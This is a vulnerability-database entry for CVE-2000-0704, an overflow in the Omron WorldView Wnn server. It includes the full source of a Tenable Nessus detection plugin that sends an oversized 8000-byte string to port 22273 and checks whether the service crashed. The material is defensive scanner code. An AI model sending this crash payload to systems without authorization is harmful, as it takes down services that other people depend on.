Vulnerabilities > CVE-2000-0704 - Remote Buffer Overflow vulnerability in Omron WorldView Wnn Asian Language Server

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
freewnn
omron
wnn
critical
nessus
exploit available

Summary

Buffer overflow in SGI Omron WorldView Wnn allows remote attackers to execute arbitrary commands via long JS_OPEN, JS_MKDIR, or JS_FILE_INFO commands.

Vulnerable Configurations

Part Description Count
Application
Freewnn
3
Application
Omron
1
Application
Wnn
3

Exploit-Db

description: WorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow Vulnerability. CVE-2000-0704. Remote exploit for unix platform
id: EDB-ID:20163
last seen: 2016-02-02
modified: 2000-03-08
published: 2000-03-08
reporter: UNYUN
source: https://www.exploit-db.com/download/20163/
title: WorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow Vulnerability

Nessus

NASL family: Gain a shell remotely
NASL id: WNN_OVERFLOW.NASL
description: It was possible to make the remote Wnn server crash by sending an oversized string to it.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11108
published: 2002-08-22
reporter: This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11108
title: Omron WorldView Wnn Multiple Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# References:
# http://www.tomo.gr.jp/users/wnn/0008ml/msg00000.html
# http://online.securityfocus.com/advisories/4413

include("compat.inc");

# Registration phase: when the plugin is loaded with `description` set, only
# the metadata below is recorded and the script exits (see exit(0) at the end
# of this block) before any network traffic is generated.
if (description)
{
  # Plugin identity and revision.
  script_id(11108);
  script_version("1.18");
  script_cvs_date("Date: 2018/08/07 16:46:50");

  # External identifiers for the flaw this plugin checks.
  script_cve_id("CVE-2000-0704");
  script_bugtraq_id(1603);

  # Short name and one-line summary.
  script_name(english:"Omron WorldView Wnn Multiple Command Remote Overflow");
  script_summary(english:"Checks if the remote Wnn can be buffer overflown");

  # Report text: what was observed, what to do about it, vendor advisory.
  script_set_attribute(attribute:"synopsis", value:"The remote service is vulnerable to a buffer overflow.");
  script_set_attribute(attribute:"description", value:
"It was possible to make the remote Wnn server crash by sending an
oversized string to it.");
  script_set_attribute(attribute:"solution", value:"Upgrade to the latest version or contact your vendor for a patch.");
  script_set_attribute(attribute:"see_also", value:"ftp://patches.sgi.com/support/free/security/advisories/20000803-01-A");

  # Severity: CVSS v2 base and temporal vectors, plus exploit availability.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");

  # Timeline.
  script_set_attribute(attribute:"vuln_publication_date", value:"2000/03/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/22");

  # The result is registered as a *potential* vulnerability found by a remote
  # check: the plugin observes a service outage, not the overflow itself.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_end_attributes();

  # Registered in the destructive category: the description above states that
  # the check can crash the remote Wnn server.
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"Gain a shell remotely");
  script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");

  # Preconditions: the paranoid-report setting key and the Wnn TCP port.
  script_require_ports(22273);
  script_require_keys("Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

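# Safety gate: the request sent below can take the Wnn service down, so the
# check only proceeds when report_paranoia is 2 or higher; otherwise
# audit(AUDIT_PARANOID) ends the script.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# Fixed TCP port probed by this check (same value as script_require_ports).
port = 22273;

# Record why the check did not run instead of exiting silently, so a scan log
# distinguishes "not tested" from "tested and not affected".
if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);

soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL, port);

# Two 4-byte header words precede the oversized string.
# NOTE(review): their protocol meaning is not documented in this listing;
# confirm against a Wnn protocol reference before changing them.
send(socket:soc, data:raw_string(0x00, 0x00, 0x00, 0x01));
send(socket:soc, data:raw_string(0x00, 0x00, 0x40, 0x00));

# 8000-byte filler string with NUL bytes placed at offsets 10 and 799; the
# offsets are kept exactly as in the original plugin.
buf = crap(8000);
buf[10] = raw_string(0);
buf[799] = raw_string(0);
send(socket:soc, data:buf);
close(soc);

# Give the service a moment, then test whether it still accepts connections.
sleep(1);
soc2 = open_sock_tcp(port);
if (soc2)
{
  # Service still answers: release the second socket (the original never
  # closed it) and report nothing.
  close(soc2);
  exit(0);
}

# A failed reconnect is treated as evidence that the service crashed. This is
# indirect: a listener that is slow to accept again, or a filtering device
# reacting to the request, gives the same result, which is why the plugin is
# registered as a potential vulnerability. A finding also means the service is
# no longer accepting connections and needs to be restarted.
security_hole(port);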